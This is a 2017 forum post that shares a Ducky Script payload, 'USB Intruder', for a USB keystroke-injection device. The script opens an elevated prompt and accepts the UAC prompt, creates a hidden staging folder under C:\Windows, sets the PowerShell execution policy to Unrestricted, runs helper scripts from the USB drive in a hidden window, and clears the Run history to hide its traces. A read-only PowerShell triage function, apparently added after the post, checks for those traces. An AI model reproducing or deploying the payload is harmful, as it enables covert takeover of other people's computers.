B0rk
Posted May 24, 2017 (edited)

Hello all,

I am posting the Ducky Script for the USB Intruder I made available on the BashBunny. If you would like to run USB Intruder on the TwinDuck FW, you will need to download the BashBunny payloads from GitHub and delete the payload.txt from the USB_Intruder payload folder and replace it with the following code for the inject.bin file. I'm being lazy on this post, so if you want more information on it, check the readme.md from my BB Payload. You will also need to name the storage "Ducky" (minus the quotes) in order for this payload to execute properly.

```
DELAY 2000
GUI d
DELAY 100
GUI r
DELAY 500
STRING powershell -Command "Start-Process cmd -Verb RunAs"
ENTER
DELAY 1000
ALT y
DELAY 800
STRING mkdir C:\Windows\ProgData
ENTER
STRING attrib +h C:\Windows\ProgData
ENTER
STRING powershell
ENTER
DELAY 800
STRING Set-ExecutionPolicy Unrestricted
ENTER
STRING powershell ".((gwmi win32_volume -f 'label=''Ducky''').Name+'\d.cmd')"
ENTER
DELAY 2000
STRING cd $Env:WinDir\ProgData
ENTER
STRING .\seq1.ps1
ENTER
DELAY 1000
STRING powershell -WindowStyle Hidden $Env:WinDir\ProgData\shell.bat
ENTER
STRING exit
ENTER
STRING exit
ENTER
DELAY 500
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
ENTER
```

Edited May 24, 2017 by B0rk
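For anyone triaging a Windows host, the script above leaves a few traces that can be checked read-only. This is an added example, not part of the original post or the USB Intruder payload; the function name `Test-UsbIntruderTraces` is hypothetical, and every path and key it checks is taken from the script above.

```powershell
# Added triage example (not from the original post). Read-only checks for the
# host-side traces named in the Ducky Script above. Function name is hypothetical.
function Test-UsbIntruderTraces {
    $findings = @()

    # 1. The script creates C:\Windows\ProgData and hides it with attrib +h.
    $staging = Join-Path $Env:WinDir 'ProgData'
    if (Test-Path -LiteralPath $staging) {
        $dir    = Get-Item -LiteralPath $staging -Force   # -Force is needed to see hidden items
        $hidden = [bool]($dir.Attributes -band [IO.FileAttributes]::Hidden)
        $findings += "Staging directory present: $staging (hidden=$hidden, created=$($dir.CreationTime))"
        # seq1.ps1 and shell.bat are the two files the script runs from that directory.
        foreach ($name in 'seq1.ps1', 'shell.bat') {
            $file = Join-Path $staging $name
            if (Test-Path -LiteralPath $file) { $findings += "Payload file present: $file" }
        }
    }

    # 2. The script runs Set-ExecutionPolicy Unrestricted from an elevated prompt.
    foreach ($entry in (Get-ExecutionPolicy -List)) {
        if ($entry.ExecutionPolicy -eq 'Unrestricted') {
            $findings += "Execution policy is Unrestricted at scope $($entry.Scope)"
        }
    }

    # 3. The last step deletes every value under the current user's RunMRU key.
    #    An empty key is only a weak signal: a fresh profile looks the same.
    $mru = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if ((Test-Path $mru) -and -not (Get-Item $mru).Property) {
        $findings += 'RunMRU key exists but holds no values (Run history may have been cleared)'
    }

    # 4. The script locates its storage by the volume label 'Ducky' via Win32_Volume.
    foreach ($vol in (Get-CimInstance -ClassName Win32_Volume -Filter "Label='Ducky'")) {
        $findings += "Volume labelled 'Ducky' is mounted at $($vol.Name)"
    }

    return $findings
}

$result = Test-UsbIntruderTraces
if ($result) { $result | ForEach-Object { Write-Warning $_ } }
else         { Write-Output 'None of the checked traces were found.' }
```

Run it as the user being investigated, since the RunMRU check reads that user's HKCU hive.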